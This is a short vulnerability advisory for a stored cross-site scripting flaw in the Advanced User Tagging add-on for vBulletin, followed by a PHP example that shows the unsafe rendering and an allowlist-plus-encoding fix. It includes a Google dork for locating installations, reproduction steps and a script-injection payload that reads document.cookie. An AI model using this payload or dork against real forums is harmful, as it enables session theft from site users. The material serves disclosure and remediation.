Advanced User Tagging vBulletin Stored XSS Vulnerability

2013-07-10 / 2013-07-24
Credit: []0iZy5
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##############################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##############################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##############################################
#
# This was written for educational purposes only. Use it at your own risk.
# The author will not be responsible for any damage caused! The user assumes all responsibility.
# Intended for authorized web application pentesting only!
#
##############################################
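The fix for this class of bug (CWE-79), shown as an added example that is not the add-on's own code: validate the hash tag against an allowlist when it is saved, and HTML-encode it when it is rendered. The function names, the allowlist policy and the surrounding markup are assumptions; the leading `">` in the advisory's example suggests the stored value is echoed inside a quoted attribute, so the sketch uses that context.

```php
<?php
// Added example. Helper names and markup are hypothetical, not taken from
// Advanced User Tagging or vBulletin.

// Input side: accept only what a hash tag needs.
// Assumed policy: letters, digits and underscore, 1 to 50 characters.
function is_valid_hashtag(string $tag): bool
{
    return preg_match('/\A[\p{L}\p{N}_]{1,50}\z/u', $tag) === 1;
}

// Before: the stored value is concatenated raw into an attribute and into
// element content, so a value containing "> closes the attribute and the tag.
function render_subscription_unsafe(string $tag): string
{
    return '<input type="checkbox" name="tags[]" value="' . $tag . '"> #' . $tag;
}

// After: encode at output time. ENT_QUOTES encodes both quote styles, so the
// value cannot terminate the attribute; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function render_subscription_safe(string $tag): string
{
    $enc = htmlspecialchars($tag, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="checkbox" name="tags[]" value="' . $enc . '"> #' . $enc;
}

// Constructed inputs: one ordinary tag and the example string from the advisory.
$samples = ['vbulletin', '"><script>alert(document.cookie)</script>'];

foreach ($samples as $tag) {
    printf("input:     %s\n", $tag);
    printf("allowlist: %s\n", is_valid_hashtag($tag) ? 'accepted' : 'rejected');
    printf("unsafe:    %s\n", render_subscription_unsafe($tag));
    printf("safe:      %s\n\n", render_subscription_safe($tag));
}
```

Output encoding is the control that matters for rows already in the database: values stored before the allowlist existed are neutralised at render time without a data migration.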

References:

http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
http://www.backtrack-linux.ro

